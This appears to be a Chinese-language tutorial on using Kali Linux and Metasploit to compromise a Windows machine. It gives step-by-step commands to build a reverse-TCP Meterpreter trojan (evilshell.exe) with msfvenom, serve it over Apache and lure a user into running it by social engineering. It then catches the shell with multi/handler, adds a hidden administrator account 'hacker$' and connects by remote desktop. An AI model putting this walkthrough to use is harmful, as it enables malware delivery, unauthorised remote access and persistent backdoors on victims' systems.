Kali系统基于Debian的数字取证系统,上面集成了很多渗透测试工具,其前身是BT5 R3(BackTrack),其中Metasploit是一个综合利用工具,极大的提高了攻击者的渗透效率,使用Ruby开发,使用非常方便,进入工具的方式:msfconsole,MSF依赖于Postgresql数据库,在使用MSF前要开启该数据库
1. 生成木马,通过msfvenom

msfvenom -p(后加payload) windows/meterpreter/reverse_tcp lhost=kali's ip(攻击者的ip) lport=5555(端口号) -f exe > ./root/desktop/evilshell.exe

-p 参数后加payload,攻击成功后要做什么事情
lhost 后跟监听的ip
lport 后跟监听的端口
-f 后跟要生成的后门文件的类型

2. 将木马文件evilshell.exe拷贝到/var/www/html,开启apache,在肉鸡上开启浏览器访问kali的ip,点击evilshell.exe将文件保存至windows桌面


3. 开启postgresql(端口5432),/etc/init.d/postgresql start,输入msfconsole进入msf服务

/etc/init.d/postgresql start
=[ metasploit v5.0.46-dev ]
+ -- --=[ 1921 exploits - 1075 auxiliary - 330 post ]
+ -- --=[ 556 payloads - 45 encoders - 10 nops ]
+ -- --=[ 4 evasion ]

exploits:开发利用,攻击某些服务、平台、系统等用到的工具
payload:载荷载体,攻击成功后要操作什么

4.加载exploits和payloads,查看该模块需要设置的参数,这里的路径要和上面生成木马时的payload一致

msf5>use exploit/multi/handler 选择exploits
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp  设置payload
show options  查看所需设置的参数

输入命令后会出现所需设置的参数,将lhost与lport设置为与生成木马时一样

set lhost kali的IP  设置监听地址
set lport 5555  设置监听端口
run 或者exploit  运行攻击模块
例:
Msf5>use exploit/multi/handler
Msf5>exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
Msf5>exploit(multi/handler) >show options
Msf5>exploit(multi/handler) >set lhost 192.168.217.136
Msf5>exploit(multi/handler) >set lport 5555
 

5.在肉鸡中诱导用户点击exe程序(社会工程学攻击),在kali中会得到肉鸡的shell(meterpreter)
点击后在kali中

meterpreter > shell 获取目标主机的shell
Net user hacker$ root /add 创建新用户并将该用户密码设置为root
Net localgroup administrators hacker$ /add 将用户添加至管理员组中

net user host$ 查看host$用户信息

在kali中重新开启一个终端,rdesktop 192.168.217.134 使用远程桌面连接目标主机(默认端口为3389)如果失败需要在目标主机上开启

01-16 09:18